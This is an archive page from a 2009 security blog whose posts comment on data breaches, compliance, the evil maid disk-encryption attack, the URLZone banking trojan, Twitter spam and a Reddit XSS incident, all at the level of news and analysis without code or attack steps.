28. December 2009 · Comments Off on Verizon Business 2009 DBIR Supplemental Report provides empirical guidance for unifying security and compliance priorities · Categories: Breaches, Compliance, Risk Management, Security Management, Theory vs. Practice · Tags: , , ,

The Verizon Business security forensics group's recently released 2009 Data Breach Investigations Supplemental Report provides common ground between those in the enterprise who are compliance oriented and those who are security oriented. While in theory, there should be no difference between these groups, in practice there is.   

Table 8 on page 28 evaluates the breach data set from the perspective of data types breached. Number one by far is Payment Card Data at 84%. Second is Personal Information at 31%. (Obviously each case in their data set can be categorized in multiple data breach categories.) These are exactly the types of breaches regulatory compliance standards like PCI and breach disclosure laws like Mass 201 CMR 17 are focused on.

Therefore there is high value in using the report's "threat action types" analysis to prioritize risk reduction as well as compliance programs, processes, and technologies.

While the original 2009 DBIR did provide similar information in Figure 29 on page 33, it's the Supplemental report which provides the threat action type analysis that can drive a common set of risk reduction and compliance priorities.

27. December 2009 · Comments Off on First Heartland suit dismissed – executives off the hook – for now · Categories: Breaches, Compliance, Legal · Tags: ,

The first adjudicated lawsuit against the executives of Heartland Payment Systems went in favor of the defense.

As I am sure you aware, Heartland Payment Systems is embroiled in countless lawsuits as a result of the disclosure it had to make in January 2009 of a breach of over 130 million credit card numbers. It is considered the largest breach of credit card data in history.

A class action shareholder lawsuit filed against the executives of Heartland was dismissed earlier this month by Judge Anne Thompson of the U.S. District Court of New Jersey on the basis that the executives' claim that they took security seriously was not a lie. Here is the actual opinion.here.

Gene Schultz weighed in with a thoughtful opinion here.

While I am no lawyer, it seems to me that this lawsuit was very narrowly focused and based on my reading of the opinion, it's hard to see how the judge could have found for the plaintiff. 

A lawsuit that would bring out the emails and memos associated with a variety of compliance and security decisions made by the Heartland executives would be more interesting.

24. November 2009 · Comments Off on Massive T-Mobile UK trade secret theft perpetrated by insider · Categories: Breaches, Data Loss Prevention, Trade Secrets Theft · Tags: , , ,

Last week T-Mobile UK admitted to the theft of millions of customer records by one or more insiders. These customer records which included contract expiration dates were sold to T-Mobile competitors or third party brokers who "cold called" the T-Mobile customers when their contracts were about to expire to get them to convert.

While this is a privacy issue from the customer perspective, from T-Mobile's perspective it's also theft of trade secrets.

And this is about as basic as theft of trade secrets gets. According to the article in the Guardian, in the UK this type of crime is only punishable by fine, not jail time, although the Information Commissioner's Office "is pushing for stronger powers to halt the unlawful trade in personal data…"

So if you steal a car, you can go to jail, but if you steal millions of customer records, you can't. Clearly the laws must be changed. Or, not being a lawyer, I am missing something.

Based on some research I've done, the same is true in the United States, i.e. no jail time. Here are some good links that cover trade secret law in the US:

Regardless of the laws and their need for change, organizations must invest in trade secret theft prevention appropriate to the associated level of risk.

Let's take a look at the components of Risk – Threat, Asset Value, Likelihood and Economic Loss -  in the context of trade secret theft.

The overall Threat is increasing as the specific methods of theft of digital Assets constantly evolve. Economic loss, depending on the Value of the trade secret Asset, can range from
significant to devastating, i.e. wiping out much or all of an organization's value.

It's hard to imagine the Likelihood of theft of any trade secret in digital form could ever be rated as low. Unfortunately we do not have well accepted quantitative metrics for measuring the degree to which administrative and technical controls can reduce Likelihood.

Therefore trade secret theft risk
mitigation is really a continuous process rather than a one time effort. New threats are always appearing. New administrative and technical controls must constantly be reviewed and where appropriate implemented in order to minimize the risk of trade secret theft.

26. October 2009 · Comments Off on Evil Maid attack shows that laptop hard drive encryption not the silver bullet · Categories: Breaches, Malware, Risk Management · Tags: , , , ,

As important as laptop hard drive encryption is, it's not the silver bullet for protecting confidential data on laptops. Bruce Schneier described Joanna Rutkowska's "evil maid" attack against a disk encryption product. This type of attack would probably work against any disk encryption product because disk encryption does not defend against an attack where the attacker gets access to your encryption key.

As usual, risk management is about understanding the threat which you are trying to mitigate. Disk encryption does solve the stolen laptop problem. But if an attacker can get access to your laptop multiple times without your realizing it, the evil maid attack can defeat disk encryption.

PGP, a disk encryption vendor, discusses the limitations of disk encryption and as well as other defenses available to protect against evil maid and other attacks.

Bruce Schneier notes that two-factor authentication will defeat the evil maid attack. BTW, don't leave your token in the hotel room for the evil maid to find. 🙂

Wired Magazine reported this week that Wal-Mart kept secret a breach it discovered in November 2006 that had been ongoing for 17 months. According to the article, Walmart claimed there was no reason to disclose the exploit at the time as they believe no customer data or credit card information was breached.

They are admitting that custom developed Point-of-Sale software was breached. The California Breach Law covering breached financial information of California residents had gone into effect on July 1, 2003 and was extended to health information on January 1, 2009. I blogged about that here.

I think it would be more accurate to say that the forensics analysts hired by Wal-Mart could not "prove" that customer data was breached, i.e., could not find specific evidence that customer data was breached. One key piece of information the article revealed, "The company’s server logs recorded only unsuccessful log-in attempts, not successful ones, frustrating a detailed analysis."

Based on my background in log management, I understand the approach of only collecting "bad" events like failed log-ins. Other than this sentence the article does not discuss what types of events were and were not collected. Therefore they have very little idea of what was really going on.

The problem Wal-Mart was facing at the time was that the cost of collecting and storing all the logs in an accessible manner was prohibitive. Fortunately, log data management software has improved and hardware costs have dropped dramatically. In addition there are new tools for user activity monitoring.

However, my key reaction to this article is my disappointment that Wal-Mart chose to keep this incident a secret. It's possible that news of a Wal-Mart breach might have motivated other retailers to strengthen their security defenses and increase their vigilance, which might have reduced the number of breaches that occurred since 2006. It may also have more quickly increased the rigor QSAs applied to PCI DSS audits.

In closing, I would like to call attention to Adam Shostack's and Andrew Stewart's book, "The New School of Information Security," and quote a passage from page 78 which talks about the value of disclosing breaches aside from the need to inform people whose personal financial or health information may have been breached:

"Breach data is bringing us more and better objective data than any past information-sharing initiative in the field of information security. Breach data allows us to see more about the state of computer security than we've been able to with traditional sources of information. … Crucially, breach data allows us to understand what sorts of issues lead to real problems, and this can help us all make better security decisions."

09. October 2009 · Comments Off on Cloud-based Data Leak Detection complements Data Leak Prevention – Monitoring P2P Networks · Categories: Breaches, Data Loss Prevention, IT Security 2.0, Privacy · Tags: , ,

Can you imagine your Data Leak Prevention system not being perfect? Is there value in a service that scans P2P networks looking for leaked data that eluded your Data Leak Prevention (DLP) controls?

Tiversa offers such a service. In an example of the value of their service, according to a Washington Post article, they claim that "the personal data of tens of thousands of U.S. soldiers – including those in the Special Forces – continue to be downloaded to unauthorized computer users in countries such as China and Pakistan…"

On a separate, but possibly related note, there was an Ars Technica article last last week on a bill working its way through Congress called the "Informed P2P User Act." From the Ars Technica article:

"First, it requires P2P software vendors to provide "clear and
conspicuous" notice about the files being shared by the software and
then obtain user consent for sharing them. Second, it prohibits P2P
programs from being exceptionally sneaky; surreptitious installs are
forbidden, and the software cannot prevent users from removing it."

It's clear that P2P represents risks that can be reduced by both technical and legal means.


04. October 2009 · Comments Off on Canadian study reports breaches triple in 2009. Is this a valid statistic? · Categories: Breaches, Security Management · Tags: , , , ,

Earlier this week, Telus released the results of their 2009 joint Telus/Rotman School of Management at the University of Toronto study on Canadian IT Security Practices, which claimed that the number of breaches tripled to an average of 11.3. Here is the press release. But are these valid claims?

First, let's take a deeper look at the average of 11.3. By simply taking the raw answers of the 2009 question about the number of breaches during the last 12 months, the average, i.e. mean, is indeed 11.3. However, let's take a closer look at the actual responses:

Number of Breaches   Percentage of Organizations

0                                      14%

1                                        6%

2 to 5                                 33% 

6 to 10                                9%

11 to 25                              7%

26 to 50                              3%

51 to 100                            2%

More than 100                     2%

Don't know                          23%

Given the number of outliers, the average (mean) is not really a valid number. Those outliers significantly skew the average. The mode, between 2 and 5, is much more meaningful.

Also, there is no attempt to correlate the number of breaches an organization suffered with the organization's size. Of the 500 organizations participating, 31% had under 100 employees and 23% had over 10,000 employees. The point here is that the outliers may very well be a small group of very large organizations.

Now let's address the claim of "tripling." What could account for this huge increase?

  1. It may just be a case of people being more honest this year, i.e. reporting more breaches. After all, this is just a survey.
  2. It may be that organizations actually have better security controls in place and therefore detected more breaches.
  3. It may be a function of the organizations participating. In 2008, there were only 297 versus 500 in 2009.
  4. It could be the change in the way the question was worded in 2009 versus 2008. Here is the question from 2008 (In fact the only place in the study that uses real numbers rather than percentages):

Q40. A major IT security incident can be defined as one which causes a disruption to normal activities such that significant time, resources, and/or payments are required to resolve the situation. Based on this definition, how many major security incidents do you estimate your organization has experienced in the last 12 months?

1 to 5             63%

6 to 10             2%

More than 10    1%

Don't know       24%

The 2009 study question:

Q48. How many Security breaches do you estimate your organization has experienced in the past 12 months?

I provided the responses earlier in this post. The point is that in 2008, the question specifically asked about major incidents while in 2009 the question was about all breaches.

Also note, in both cases the organizations were asked for "estimates." Don't most of these organizations have Security Incident Response Teams? At least the 69% with over 100 full time employees? Wouldn't they know exactly how many "incidents" they investigated and how many were actual breaches? 

I suppose studies like these, based on surveys, have some value, but we really need information based on facts and analysis based on sound techniques.

04. October 2009 · Comments Off on URLZone – Funds Transfer Fraud innovation accelerates · Categories: Botnets, Breaches, Funds Transfer Fraud, Innovation, Malware · Tags: , , ,

Web security firm, Finjan, published a report (Issue 2, 2009) this week on a more advanced funds transfer fraud trojan called URLZone. It basically follows the now well understood process I blogged about previously, where:

  1. Cybercriminals infect Web sites using, for example, Cross Site Scripting.
  2. Web site visitors are infected with a trojan, in this case URLZone.
  3. The trojan is used to collect bank credentials.
  4. Cybercrirminals transfer money from the victims to mules.
  5. The money is transferred from the mules to the cybercriminals.

URLZone is a more advanced trojan because of the level of automation of the funds transfer fraud  (direct quotes from the Finjan report):

  • It hides its fraudulent transaction(s) in the report screen of the compromised account.
  • Its C&C [Command and Control] server sends instructions over HTTP about the amount to be stolen and where the stolen money should be deposited.
  • It logs and reports on other web accounts (e.g., Facebook, PayPal, Gmail) and banks from other countries.

In the past, the trojan was merely a keylogger that sent credentials back to the cybercriminal. These exploits were mostly against small businesses and schools where relatively large amounts of money could be stolen. But the URLZone trojan has much more sophisticated command and control which enables a much higher volume of transactions. Finjan reports 6,400 victims in 22 days losing 300,000 Euros. So far all the victims have been in Germany.

30. September 2009 · Comments Off on Twitter is dead · Categories: Application Security, Breaches · Tags: , , ,

According to Robert X. Cringeley, long time computer industry pundit, Twitter is dead. Why?

"Twitter is dead because it is now so popular that the spammers and
the scammers have arrived in force. And history tells us that once they
sink their teeth into something, they do not let go. Ever.

Twitter scams aren't new. But I've never seen so many hit in a single week or with such rigorous precision."

Symantec has a nice blog post about one of the underlying problems with Twitter, i.e. since Twitter is limited to 140 characters, people use "URL shorteners" instead of the actual URLs to which they are referring. Therefore you have no idea where you are going when you click on the shortened URL.

Cringely closes with this:

Spam will kill Twitter's usefulness for everyone but relentless
Internet marketers, unless the brainiacs at TwitCentral can figure out
a better way to block it. Smart people have tried and failed everywhere
else, though. I don't hold out much hope.

My view is that just as with any new technology, if there are real benefits people will tolerate the risks for some period of time and third parties will develop solutions to mitigate the risks. This is the history of the whole IT security industry.

Take email for example. Email has been so valuable that people tolerated spam for some time. Then third parties developed anti-spam solutions for which enterprises were willing to pay and consumers got as a feature of either their email client or anti-malware product.

On the other hand, there is still a huge amount of email spam, which means that email spamming is still profitable. Therefore there are tons of people who either are not availing themselves of anti-spam filters or for some reason still fall for spam scams.

Yet with all that spam, there is no sign of email dying due its immense value.


30. September 2009 · Comments Off on Popular social news site infected with XSS exploit · Categories: Application Security, Breaches, Malware, Secure Browsing · Tags: , , ,

The popular social news site Reddit was breached with an XSS exploit. Of course, the article does not indicate what, if any, protection methods Reddit was using to prevent this most popular of web site exploits. I wonder how they would do if an auditor showed up tomorrow using CSIS's Twenty Critical Cyber Security Controls (I previously posted) as a reference.